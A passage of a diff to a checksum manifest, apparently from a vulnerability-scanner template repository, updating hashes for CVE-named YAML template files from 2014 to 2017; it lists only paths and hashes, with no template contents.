http/cves/2014/CVE-2014-8799.yaml:e2899a7c8ca8196f7138c225e30af40dbef8fd05 -http/cves/2014/CVE-2014-9094.yaml:fcafea40a4f65c4aaa4bcb84664f37bd35ef73a6 +http/cves/2014/CVE-2014-9094.yaml:a68af830dffb3c876fca8cbeb753dc533a7f5cb5 http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:2c5abaa406e7cafd49261cee3e4318c171003266 +http/cves/2014/CVE-2014-9180.yaml:fa444c08f91a4c9b12135e4e9d91972d00c2666b http/cves/2014/CVE-2014-9444.yaml:f33dc2ffea4e7307bfd997daad8cd6bccc82d266 http/cves/2014/CVE-2014-9606.yaml:b85356b15dad93b20df3cc8884e727d57733b88c http/cves/2014/CVE-2014-9607.yaml:bfc63136609830a20e576b4a70729a9706e1c841 @@ -1161,112 +1161,112 @@ http/cves/2015/CVE-2015-1000005.yaml:6bbb08fc5f35845e1796eec9f53f682f39a0b7d1 http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb http/cves/2015/CVE-2015-1427.yaml:2cceec2e205f316b1fc790135f3c66b11075118d -http/cves/2015/CVE-2015-1503.yaml:561b513b374afd9e4fb928590522d472c772b763 +http/cves/2015/CVE-2015-1503.yaml:2b6b879d4c715cf556fefba788ce4f431a6182b1 http/cves/2015/CVE-2015-1579.yaml:52b616d917b5e92f3ab3b1732938e62af4957557 -http/cves/2015/CVE-2015-1635.yaml:964e8edbd94bf69e01343d32a45edd3a41a81e33 -http/cves/2015/CVE-2015-1880.yaml:2106dedecc0089ac5f079dce8bd3811a12347c7b -http/cves/2015/CVE-2015-20067.yaml:e742bde1ee621ed13a8f00727657ddb135e518c1 -http/cves/2015/CVE-2015-2067.yaml:e9366e488197cbcce943f06f9d3836513ce5611e -http/cves/2015/CVE-2015-2068.yaml:9b962a2f2719c7b2e4ca5593fa5b50f05d3cbece +http/cves/2015/CVE-2015-1635.yaml:6727f7d9940379be0f50b956e6ecdb328a4b305e +http/cves/2015/CVE-2015-1880.yaml:5b44448171225acc23fb5061ed4e054d55a1f8d6 +http/cves/2015/CVE-2015-20067.yaml:b9519aa947a06a81ed9409492f0e532d48c68d68 +http/cves/2015/CVE-2015-2067.yaml:0ffb662a14f050a398742d8acd2b2620a89ffa78 +http/cves/2015/CVE-2015-2068.yaml:7c570e0b66635ba0d317627b57057a889405f186 http/cves/2015/CVE-2015-2080.yaml:b232c65718854a1049244802081c696ecc31eb82 http/cves/2015/CVE-2015-2166.yaml:2869726e68902758b097a2b7f02925968ef0aeff http/cves/2015/CVE-2015-2196.yaml:bd31271f82bc747db7d750a1d9890ed09c4192d3 http/cves/2015/CVE-2015-2755.yaml:ac90343bbd36f1d7328d675ac69317f3ae2a46bd -http/cves/2015/CVE-2015-2794.yaml:71b609abc6ba3a2acb4d21f71c110da683d029ba -http/cves/2015/CVE-2015-2807.yaml:f243265d74f0d7094d38efc9782985a1b0ff35a1 +http/cves/2015/CVE-2015-2794.yaml:2607c1dbe9a392adbe33d648e111dffddb149b35 +http/cves/2015/CVE-2015-2807.yaml:180e358218f8ffbad75fb020b3c129f8f1248204 http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f http/cves/2015/CVE-2015-2996.yaml:24c0c2213add5edba15d035eb9690636f24e3999 -http/cves/2015/CVE-2015-3035.yaml:b49930ad5938f020e483e39c14be0d41e277c5ff +http/cves/2015/CVE-2015-3035.yaml:cdcb5178bec31ca13db8f34c81d92b0f50ae1d0b http/cves/2015/CVE-2015-3224.yaml:f1b418ea3923fe6ce83982865ea6a8f4196b23fe http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 -http/cves/2015/CVE-2015-3897.yaml:f6c517ef234c23ab58341e440183887086535cc7 +http/cves/2015/CVE-2015-3897.yaml:2c99a2568eb635f5e58cd4803bb50ec3482c4d62 http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 http/cves/2015/CVE-2015-4062.yaml:8c16e8680fcb2c9c9a9cea48e3dfac365c09fdcd -http/cves/2015/CVE-2015-4063.yaml:480de1365099b9855f4e9621a70599f7801abe7e +http/cves/2015/CVE-2015-4063.yaml:73fd1011f479ba835d4e1df949c173e05e3fa187 http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 -http/cves/2015/CVE-2015-4127.yaml:3deb3fad38b9a3f2e96ba44b7a7cefda2206c7c3 +http/cves/2015/CVE-2015-4127.yaml:8e3cc35845ff4b07a83527875682fa9fb1c1c226 http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:4a7764b6d1c95209cf305e09f3f30feb2c7895aa +http/cves/2015/CVE-2015-4455.yaml:2314814ef03598efcd25fbf6022e11b2d05242fa http/cves/2015/CVE-2015-4632.yaml:8b2f1aa45ef9876de13f529f40b0ad7698ab1dc8 http/cves/2015/CVE-2015-4666.yaml:4ce784f10bfa966a6f5ecf859b9a80850a6c2aae http/cves/2015/CVE-2015-4668.yaml:7b1b38f3c97bb09484a822df734f429e136deed9 http/cves/2015/CVE-2015-4694.yaml:fb0332f2f71695e7eaea56de97197ef7924b5fcc http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 http/cves/2015/CVE-2015-5461.yaml:ccdf5da24f86d86ab0916171941d351a5ebcc120 -http/cves/2015/CVE-2015-5469.yaml:96ca2b4aae65ac3849219d8d0c070e7e119154db +http/cves/2015/CVE-2015-5469.yaml:81658b964a8c79699671fc10efd87b5373175fe3 http/cves/2015/CVE-2015-5471.yaml:b4ab394eb025425254e020ef76d91a62d84c88af http/cves/2015/CVE-2015-5531.yaml:7298c9d71d9bfe34269c16623a7676de7fc6fd09 http/cves/2015/CVE-2015-5688.yaml:b4a080196c1edcc203a9c220392daaa98837e7ed http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 -http/cves/2015/CVE-2015-6920.yaml:aebfa8ec1754a73a3491066884b3a28b1e2b4164 +http/cves/2015/CVE-2015-6920.yaml:20d882746bce75ef35ddcc9d0cfe10f157e58a5e http/cves/2015/CVE-2015-7245.yaml:f5ff558dc2e6aaf7c6fddea351eef15b0fc314b0 -http/cves/2015/CVE-2015-7297.yaml:0e3409721e707b2ab9f87b089935ec3d8b23e607 +http/cves/2015/CVE-2015-7297.yaml:ece302734b6d1a9b2d350e363b35fdeeae7feeda http/cves/2015/CVE-2015-7377.yaml:91d20f0b6f6c80a103811c9c813ae2d8c9c6f766 -http/cves/2015/CVE-2015-7450.yaml:bfc13fd83578bebbcca5de65b287e75b1309e57d -http/cves/2015/CVE-2015-7780.yaml:094b678bafc06744c06b1a374b1c90787bd2b64f -http/cves/2015/CVE-2015-7823.yaml:7e32266f3669c3838587a1fc5c57dc8fb0bd75c1 +http/cves/2015/CVE-2015-7450.yaml:578487d1adf3591c29ef17aa98e222facc21c8e1 +http/cves/2015/CVE-2015-7780.yaml:353b0363275dc05f4d2f6c352a61b80eedc1de43 +http/cves/2015/CVE-2015-7823.yaml:037fa0a802e5e6081be7d50f78227d296733ad25 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 -http/cves/2015/CVE-2015-8399.yaml:5ebee8fc30e297250baecdd83da02e9898760f1f +http/cves/2015/CVE-2015-8399.yaml:a504f142c32f0e890063057088ffb8c3b39c4a74 http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc -http/cves/2015/CVE-2015-9414.yaml:a6a0919e3c31eb44f95d9ce4f3b6ecd4c7c7bec6 +http/cves/2015/CVE-2015-9414.yaml:622709c3ec495a0ab85611f20d75bfd260de61bb http/cves/2015/CVE-2015-9480.yaml:70993e12643bcf8303d221fa8475aff4a9c0c1de -http/cves/2016/CVE-2016-0957.yaml:8f172a70cff48b9ca689f3ec50693d5163354260 -http/cves/2016/CVE-2016-1000126.yaml:5757c086a103ee514e9ad59f809bb5ed32914de7 -http/cves/2016/CVE-2016-1000127.yaml:e886c0aa8ec7de12b7daaa9e7d67f6a7f98c4e90 -http/cves/2016/CVE-2016-1000128.yaml:5cfcbb656f182548afe46b2f4090cde1303ed86d -http/cves/2016/CVE-2016-1000129.yaml:e84e7696f44528ad1160ff7c92c88316058599d4 -http/cves/2016/CVE-2016-1000130.yaml:a55d1c2cdd98a56880b173b62754ae32e279df58 -http/cves/2016/CVE-2016-1000131.yaml:7db6e9daa94a39020c7aa5e16ce95e7707694498 -http/cves/2016/CVE-2016-1000132.yaml:5ae54255788cd600cdd9d2e31bdda7a42de30d09 -http/cves/2016/CVE-2016-1000133.yaml:28d3da4470396a8d946057d09b2ae08f7bffc25c -http/cves/2016/CVE-2016-1000134.yaml:4826a86e0c12527f69593079b8b529dad91fefac -http/cves/2016/CVE-2016-1000135.yaml:efcc6864de6f8908dcd54be892f2309ddb71d9c1 -http/cves/2016/CVE-2016-1000136.yaml:5e8284b806240827aba2d3624d7bd0bb17e77a00 -http/cves/2016/CVE-2016-1000137.yaml:f6c4dbbf6161625b3e65ff25abeb727277b84687 -http/cves/2016/CVE-2016-1000138.yaml:dd1278baf3c2b88b0a5eeb6c14c39ecf5b5773cb -http/cves/2016/CVE-2016-1000139.yaml:d6c6dd0fbc906699ff51e576e2fd5d33efd1c9a6 -http/cves/2016/CVE-2016-1000140.yaml:e65548868142c8562d51f5899be309f1a64d52ca -http/cves/2016/CVE-2016-1000141.yaml:58dee554d0d0adee4b7650f7d8b50c576bca4935 -http/cves/2016/CVE-2016-1000142.yaml:76f7462e00dbffda6aebae536901a9a8611745e0 -http/cves/2016/CVE-2016-1000143.yaml:0f5b638a408d9fd1ab7b5eac55fb0cedf91f2109 -http/cves/2016/CVE-2016-1000146.yaml:03157286b043f77cd3a16dd3d4fb58097d871364 -http/cves/2016/CVE-2016-1000148.yaml:b92aa0495f11d6199c856231c3c6b7e917fb82c9 -http/cves/2016/CVE-2016-1000149.yaml:ac864a89750fe4c7aecf6f9b2603df04ca1efaa8 -http/cves/2016/CVE-2016-1000152.yaml:c08196449cbdcd383f36e9a2203838fb361c9321 -http/cves/2016/CVE-2016-1000153.yaml:8f5586d2ab7c1861ddda448c9c863d5c0176352c -http/cves/2016/CVE-2016-1000154.yaml:6593c7e7a87393362dd202e0112e035cbebcfd32 -http/cves/2016/CVE-2016-1000155.yaml:1cbc627138b59462ab809e80e6b99eb510fc9e9b +http/cves/2016/CVE-2016-0957.yaml:5fe7ab27315e75f9be4a5f5ac0c9b3dd3fb948ce +http/cves/2016/CVE-2016-1000126.yaml:337b7921d96cab6c89f65be48251121fa9f3a594 +http/cves/2016/CVE-2016-1000127.yaml:efdeb64917a794245f72df1f9f3dad87d07c833b +http/cves/2016/CVE-2016-1000128.yaml:825de62a904a5333123655a18c2b3c37e9f5e1b0 +http/cves/2016/CVE-2016-1000129.yaml:56b54352074e83140a5c28f06127a7cd51182835 +http/cves/2016/CVE-2016-1000130.yaml:819d239d3169f6e73d3b88d6cf9e41b0687ab64f +http/cves/2016/CVE-2016-1000131.yaml:d525ebe1b05110319ed0783d4d62a65ffd368bc9 +http/cves/2016/CVE-2016-1000132.yaml:59df00a0ab8caefc5702fe0fd7ac188e89679daa +http/cves/2016/CVE-2016-1000133.yaml:c2cf1606a934b5557c191ca58324abb1d6571c89 +http/cves/2016/CVE-2016-1000134.yaml:98d29f4ea27b31bf8e51ad668074eb8ad8551f06 +http/cves/2016/CVE-2016-1000135.yaml:6e1d96b7cf3ab176833522a50afd2a53f863e38e +http/cves/2016/CVE-2016-1000136.yaml:58d3a314cdcd1a796196224f381ff94bd8a6bc11 +http/cves/2016/CVE-2016-1000137.yaml:3a05a20f85ae27adacb2636672c4ef39b108b6fd +http/cves/2016/CVE-2016-1000138.yaml:256aafe26bb0091436967686a601e49eb163e640 +http/cves/2016/CVE-2016-1000139.yaml:bb1b729a8f1385d1c100a036ad506c6fec523a14 +http/cves/2016/CVE-2016-1000140.yaml:d84489ba0fe46325dd4f7dd79bec75a57fccbf85 +http/cves/2016/CVE-2016-1000141.yaml:213175872d3e41bf28fe892e84ca85d7c6f3ad44 +http/cves/2016/CVE-2016-1000142.yaml:ddff5888efabbc4e3d4156112d08892f035ff459 +http/cves/2016/CVE-2016-1000143.yaml:249e276d432fd0d34dace0407a317ea802a43fc7 +http/cves/2016/CVE-2016-1000146.yaml:4a3e17c66a670bf0b21e14333f348b661888bd2b +http/cves/2016/CVE-2016-1000148.yaml:cc4ae721b733a5390ef5d5a21e2b8e0ef8ba2499 +http/cves/2016/CVE-2016-1000149.yaml:2def12e9bd6067c5d197886ae756786363c7a8e7 +http/cves/2016/CVE-2016-1000152.yaml:87066a58abfbfeb006fc309ef36dbfdd206a8f6b +http/cves/2016/CVE-2016-1000153.yaml:ba6bcf4a585bf79235aec2782605c382410cee44 +http/cves/2016/CVE-2016-1000154.yaml:74573cd61d0cbe5151cf977b913ed7b9ed888dad +http/cves/2016/CVE-2016-1000155.yaml:32c1e119b4d7ec07fa228b992777bb2b8928567b http/cves/2016/CVE-2016-10033.yaml:46d3745bada72633018639374e9274917e64c42c http/cves/2016/CVE-2016-10108.yaml:d294a26723fb6dd081c30acc03ecfdfe3ebaeace -http/cves/2016/CVE-2016-10134.yaml:41b69102acd6067e88bc81e2d02e67164478db3f -http/cves/2016/CVE-2016-10367.yaml:a1fa2076ca38f2150e8f2723650188d4263342a8 +http/cves/2016/CVE-2016-10134.yaml:a1205f62971f6c81d796041214515c3bf98b2582 +http/cves/2016/CVE-2016-10367.yaml:f7aac7206450c588cc79c7ed88204186801c05b4 http/cves/2016/CVE-2016-10368.yaml:18a03211359f0c24af9c4b6160d1c0ef2b2215d4 http/cves/2016/CVE-2016-10924.yaml:09bb7f7b66f894172c675bb3d36ef59589aa88c1 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f http/cves/2016/CVE-2016-10956.yaml:6fd083b2e80dd090fececf6794043d2a136eaadd http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 http/cves/2016/CVE-2016-10973.yaml:5607fa845f3c04fce8d349a6bce10be3bc9fd814 -http/cves/2016/CVE-2016-10993.yaml:9313ef77f1af515c9a065c5360bd459659c5d40a +http/cves/2016/CVE-2016-10993.yaml:c426b3871386ca7035d8341571a19f5497cea5b9 http/cves/2016/CVE-2016-1555.yaml:43cc763cb62fa934d7686f2ae4177a663ce52599 -http/cves/2016/CVE-2016-2389.yaml:d18fdca70a400532b4081196d99aea9f94e08200 -http/cves/2016/CVE-2016-3081.yaml:cc9eabfd9af4114c8ff9099e670c305c7750ca1a -http/cves/2016/CVE-2016-3088.yaml:ee8c0cc31d3ea08542a19108f27f0694600072a7 -http/cves/2016/CVE-2016-3978.yaml:b45cad2ea0820255d0b927e7dd421a57f938f676 +http/cves/2016/CVE-2016-2389.yaml:68dbb7b3b9c1f9d9efe2d6447e0fdbf9eadef271 +http/cves/2016/CVE-2016-3081.yaml:22e0744845f5854e82713697bf3a4a9d518024b8 +http/cves/2016/CVE-2016-3088.yaml:e4cd876a3d65ff0546dd3dcfb1f6116f74ec7ee5 +http/cves/2016/CVE-2016-3978.yaml:2c9f945d3bfbbda6fafe3bc997027b7ef060e315 http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:61b8f4be3c80738be145b94fb207227de70dd752 -http/cves/2016/CVE-2016-4977.yaml:e306fea6d2dc0cc2620e4e256b7e02a910a14d52 +http/cves/2016/CVE-2016-4975.yaml:d36afeb5733b3f67586b90019612c9042bc55e2b +http/cves/2016/CVE-2016-4977.yaml:7d20b86bcba578dac2873db5b20077c18ae5d774 http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:c7cfcd28017e1b6f7d0fa01e91e4e716aec9c230 -http/cves/2016/CVE-2016-6195.yaml:5c4ca353df264e6292f5059f0ff75e7b93227ef0 -http/cves/2016/CVE-2016-6277.yaml:2eabec66334368718a754c8957826f626a896aa5 -http/cves/2016/CVE-2016-6601.yaml:ce009e999f92b2c8a8ab7e97b8c274e9d3c57611 +http/cves/2016/CVE-2016-5674.yaml:c43a01095469413f74a62f4dd1621fa41a46c8dd +http/cves/2016/CVE-2016-6195.yaml:6a3954524acf4f0b67216b0d3c9a333351d2fd97 +http/cves/2016/CVE-2016-6277.yaml:3c4f6b293a0930757209aac9b2235a3c6c54a06e +http/cves/2016/CVE-2016-6601.yaml:b734bf8f39e414de20d5aaafc3d26e90d64f5431 http/cves/2016/CVE-2016-7552.yaml:39fc5904a9dca99e15f19f2436b6b431b73c0446 -http/cves/2016/CVE-2016-7834.yaml:0802bf4fcd3dd1476fc591725f1f87359e146ec1 -http/cves/2016/CVE-2016-7981.yaml:5b8ec0843d4f6ce5dd3652b17b25cfcc94e9cef3 +http/cves/2016/CVE-2016-7834.yaml:3f96fec734abf07f594fcd67b70a47acead9ed85 +http/cves/2016/CVE-2016-7981.yaml:97d0b2fe4c3706ecf5ed8544212a27c9e43c06ca http/cves/2016/CVE-2016-8527.yaml:0dc95f94bd9750d11ae4886a5e0c6b15d70b065e http/cves/2017/CVE-2017-0929.yaml:0d7a93b1f9d88b35c44d9f9ca56eccc62f865358 http/cves/2017/CVE-2017-1000028.yaml:2ff0a301c6342c6a2c19b297accdecc6d48d8b78 @@ -1275,181 +1275,181 @@ http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa http/cves/2017/CVE-2017-10075.yaml:ea4df8e06524ec92943b5b1d10920d92f190aa72 -http/cves/2017/CVE-2017-10271.yaml:e82b7968831e2e34ebd8173b5cf75535212c06b1 +http/cves/2017/CVE-2017-10271.yaml:04f5d5e19ca4e2d1aec871d6a9249e3702718cc3 http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:4c721af11329d438323011af4b7b27d4c39d553e +http/cves/2017/CVE-2017-11165.yaml:93032dab742c2b58e8715984eb52a5443eec17a6 http/cves/2017/CVE-2017-11444.yaml:e1fedcc6cdc98248426ca0fb2352f1cd3861e2a9 -http/cves/2017/CVE-2017-11512.yaml:99bff3d6c0043123312b29a2db66d9c66b991386 +http/cves/2017/CVE-2017-11512.yaml:74cb1db00cc9961c2b81dcb8209848c911e23c59 http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:1c364289e03ea558584956909933cdc417595792 -http/cves/2017/CVE-2017-11629.yaml:ab802fc363e09d2bfb2acec39d90651eee90438a +http/cves/2017/CVE-2017-11610.yaml:9bc881a21ff4ca6ead0b63efd63097e24e778075 +http/cves/2017/CVE-2017-11629.yaml:0ead04a5ed71636ddb4d457aecd80e34b1713bc8 http/cves/2017/CVE-2017-12138.yaml:a1554be248c76a1249afeb83ac82a58f34e20390 -http/cves/2017/CVE-2017-12149.yaml:1d1ae0c6038f4c1c0adf1b59194464613fa40808 +http/cves/2017/CVE-2017-12149.yaml:4429775b2b151cae763eceab620e1cf2b5c1636e http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c http/cves/2017/CVE-2017-12544.yaml:07292848eebcdfadb01f7e946fb853685a612de5 -http/cves/2017/CVE-2017-12583.yaml:545467f96bdc3a2415d7b7c6c15b2f818161a0b1 -http/cves/2017/CVE-2017-12611.yaml:ec6c2bf95913ae4b0de09ce611ffdeceb1904ca7 -http/cves/2017/CVE-2017-12615.yaml:7762ce2bedfd3899f5807ff87b35a7091e1fe90d -http/cves/2017/CVE-2017-12617.yaml:f2d69f026c0d0c2b776bd57deae1de61e10f2295 -http/cves/2017/CVE-2017-12629.yaml:05717fc98ead0c7f9502ca5b761b96c34ab2e9d2 -http/cves/2017/CVE-2017-12635.yaml:6db5b2c94b70bba0b705eccef8770362ebad1fa4 -http/cves/2017/CVE-2017-12637.yaml:90cef6968bc79da9073d5ab60972246453650376 +http/cves/2017/CVE-2017-12583.yaml:95345c3831efaf643064fef83b2748a268e5e667 +http/cves/2017/CVE-2017-12611.yaml:85361883c6c98ad0f4c644a688272bf7eb0073e4 +http/cves/2017/CVE-2017-12615.yaml:6d06c0fdc8149d00c8597c5522b4c9026b6783c5 +http/cves/2017/CVE-2017-12617.yaml:b6237fb4274a188b1f9ad448e320821a8ea88d79 +http/cves/2017/CVE-2017-12629.yaml:c75d842f4374f7ea0aa974ae125618cd1d15248c +http/cves/2017/CVE-2017-12635.yaml:39fb356e37aa76522032d44a91bd9f37ac477b70 +http/cves/2017/CVE-2017-12637.yaml:add753669b23f66172a951bb76ac9749967b1f72 http/cves/2017/CVE-2017-12794.yaml:c56afff76e73c7654ea22b8a35d2b410d92bccc6 -http/cves/2017/CVE-2017-14135.yaml:8b78856994e015e4119d48feca8876a91526bc2a -http/cves/2017/CVE-2017-14186.yaml:cf4a3ab29483d3b76be72fb228de332740825879 +http/cves/2017/CVE-2017-14135.yaml:2c9bcf7d7ce6e624fe9d3c1c62751f76c28e999d +http/cves/2017/CVE-2017-14186.yaml:1884d55d9aa8671e341f7076a11a68e3fc8fba4a http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b http/cves/2017/CVE-2017-14535.yaml:36184e53e63918cccb1dc69c16eb38358180f971 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 http/cves/2017/CVE-2017-14622.yaml:5ffbed6d0ec83209380bb7e610c118f762b182df http/cves/2017/CVE-2017-14651.yaml:e8adee45b732510acc3690917813717fb892a10b http/cves/2017/CVE-2017-14849.yaml:853c08fbe5c5e6c85de61301449553acbad6f05b -http/cves/2017/CVE-2017-15287.yaml:9d36d5efefd0ab6bee467c9e64dfd51898f84ab6 +http/cves/2017/CVE-2017-15287.yaml:713d55acb4358cda503845bdf585e4fc60a21e5e http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:22f8ce8a35a128a21832486e18935553ea5f1052 -http/cves/2017/CVE-2017-15944.yaml:a2dfce063a513f801f16ab729bb506ae78a50355 +http/cves/2017/CVE-2017-15715.yaml:2ec38069982ce9a43f80258549bf12e581507005 +http/cves/2017/CVE-2017-15944.yaml:5cd7381db4b6302351397b255e79c02178bb39b0 http/cves/2017/CVE-2017-16806.yaml:5a788972a7ebb5bfdda60837c9543ff996c9e9fb -http/cves/2017/CVE-2017-16877.yaml:596f96119fe3c5e365ac8a7ad491841d74376dd3 -http/cves/2017/CVE-2017-16894.yaml:cfcc6942c45ef24179101f159564cce19ec80b09 -http/cves/2017/CVE-2017-17043.yaml:4dcc28dc1efb051b58fac455eed9fe28387b5b00 -http/cves/2017/CVE-2017-17059.yaml:db14f75ffaabebc0ee5d3462e195381efb3d349d -http/cves/2017/CVE-2017-17451.yaml:5807a4617ef6a7a60e7e802b402d5598b02d2304 +http/cves/2017/CVE-2017-16877.yaml:5713245b6eefcf55e8e6fe591d2720b50edb042a +http/cves/2017/CVE-2017-16894.yaml:49dae3439f19d7a6945e529e82f144c81cea51e4 +http/cves/2017/CVE-2017-17043.yaml:134bdbd98de9e2cbb626273356a9975000bbbfe0 +http/cves/2017/CVE-2017-17059.yaml:0b19723c27d62d271d7d9f83e0acc6f1b12d9a7a +http/cves/2017/CVE-2017-17451.yaml:a26eed7b442489a5c52412968c3a0572ea217021 http/cves/2017/CVE-2017-17562.yaml:3150e287ce0f8e4f5529a0103844e02be65a5f80 -http/cves/2017/CVE-2017-17731.yaml:9acd91272f9586b06be8168a311f8f6fd4067822 -http/cves/2017/CVE-2017-17736.yaml:082f571e59c2928404cc51eeef4ea0f041881e27 +http/cves/2017/CVE-2017-17731.yaml:5e222c2c5ed1e15076bab55f52d38aade930b479 +http/cves/2017/CVE-2017-17736.yaml:65213a8fcaf3b2d0abceece3a222b9d6030c7483 http/cves/2017/CVE-2017-18024.yaml:9e42c545d599b03b2602a86a13618441d34bfafb -http/cves/2017/CVE-2017-18487.yaml:2305a0a1e62a266e437fb9b68e54418e73d5e3f9 -http/cves/2017/CVE-2017-18490.yaml:2afd96d71bf34040364d33f5e08572e0e039fea8 -http/cves/2017/CVE-2017-18491.yaml:28cbcd7a177279e7df229d7af4e4ce0dd6d732ab -http/cves/2017/CVE-2017-18492.yaml:3394dc05238fbc6748c825c9f2ddcff51a298df0 -http/cves/2017/CVE-2017-18493.yaml:3836205e2f58d2e4764ac2bbc1c639e6e441c7b7 -http/cves/2017/CVE-2017-18494.yaml:123f279ddbc3d7914d23252f68bff99ee8564d00 -http/cves/2017/CVE-2017-18496.yaml:be4685e1d99ffc7544c9495f12517f5d8e007f43 -http/cves/2017/CVE-2017-18500.yaml:41cff64139a5c1b5d3b4c15b98f6c912cee89786 -http/cves/2017/CVE-2017-18501.yaml:0e1fa6bf026c50767384d5fbff8d7e18e5c452d2 -http/cves/2017/CVE-2017-18502.yaml:817b43ebaea85b2a295ac7bb7e4cd008fe44990b -http/cves/2017/CVE-2017-18505.yaml:651618e19b63e64dcfe36b3b5b29ca38de5027d3 -http/cves/2017/CVE-2017-18516.yaml:2cdb2d34215d36810265732281877bb7225de95c -http/cves/2017/CVE-2017-18517.yaml:0c16f6dbbb213f7cd4d1b9095f6980da6277d6fc -http/cves/2017/CVE-2017-18518.yaml:38ae40ed19d3c44ca14e1882a7a62987e512662b -http/cves/2017/CVE-2017-18527.yaml:54d4834aa0374412da813dcb3b8f0a48a0bc28ff -http/cves/2017/CVE-2017-18528.yaml:22e59fc04c20ab8d9f6aa2a0ea491ca0c120a47d -http/cves/2017/CVE-2017-18529.yaml:522df37035c27bdf5cb6ab691014ce28b960bb23 -http/cves/2017/CVE-2017-18530.yaml:c90065a3437808b3ae1171c53e1966a80a91bee5 -http/cves/2017/CVE-2017-18532.yaml:ec9aab04941674377707c69aa01a0755c27f0988 +http/cves/2017/CVE-2017-18487.yaml:8d92d9ad9e0a80bb59deb77c9c5dea1c496295ca +http/cves/2017/CVE-2017-18490.yaml:1b658f4e4b2ad630e74a33bafb9c12df44476cc3 +http/cves/2017/CVE-2017-18491.yaml:a681c80771d3e38a06d502ec35ae10ba878c54ef +http/cves/2017/CVE-2017-18492.yaml:3ca1b48d84da478d8751d21854aa79f40ab07aec +http/cves/2017/CVE-2017-18493.yaml:c3eddae62c0abb6eec13ecc5eca6d95257e12d3c +http/cves/2017/CVE-2017-18494.yaml:980fe68e7adf77440a107fd516c7992647e8f949 +http/cves/2017/CVE-2017-18496.yaml:57991f9cef973d37f79d189d427f1f026ba55e60 +http/cves/2017/CVE-2017-18500.yaml:876c45abc8eeb2dfe67f79f6aef9d7a3a24cfab3 +http/cves/2017/CVE-2017-18501.yaml:b7ea9d6537e246e166a47e8c51b8372e8be6e0a2 +http/cves/2017/CVE-2017-18502.yaml:935b11dd7c1cf2fde75dbc5772e76e48f71d4c10 +http/cves/2017/CVE-2017-18505.yaml:01f39028377caedb49e2763f6da1e9ddad9c52b8 +http/cves/2017/CVE-2017-18516.yaml:905d8f4203d58007bf79c8411ba2deb9bcd9ef51 +http/cves/2017/CVE-2017-18517.yaml:5e4c1b40ef19fbccbe1ea804a480fd7608c45005 +http/cves/2017/CVE-2017-18518.yaml:229ed7bc83f9a01c97bd8c5026bc43f40e2973bc +http/cves/2017/CVE-2017-18527.yaml:e910570d43383c62fa6f15005fe85cd980fa3749 +http/cves/2017/CVE-2017-18528.yaml:1c2229d1bba8f9863847e11cd8d180c98ef90eaf +http/cves/2017/CVE-2017-18529.yaml:89c767b8b124e36686e155009e365c6c3b0c6686 +http/cves/2017/CVE-2017-18530.yaml:32dc03bb1f152ceae4c3716b380a274d3a0b7d00 +http/cves/2017/CVE-2017-18532.yaml:c086ef546c86b9b1decf726d80792a0786cf2062 http/cves/2017/CVE-2017-18536.yaml:41a5883c94c1941dbb3026c74c998dc04d1a601e -http/cves/2017/CVE-2017-18537.yaml:e589d6d33c5dccfbfb433d9f7f1d71bf080d680e -http/cves/2017/CVE-2017-18542.yaml:98003ed998917d79ff72edc00339ff021cd0ea21 -http/cves/2017/CVE-2017-18556.yaml:59b8e84e495d2fd3b88be299e3b4c2e3ef81093d -http/cves/2017/CVE-2017-18557.yaml:03e9c97c5d0c74a5eb8714e4f30e57b6293eb460 -http/cves/2017/CVE-2017-18558.yaml:99a0fc15cd711f253ad20a854694fdecc53395a8 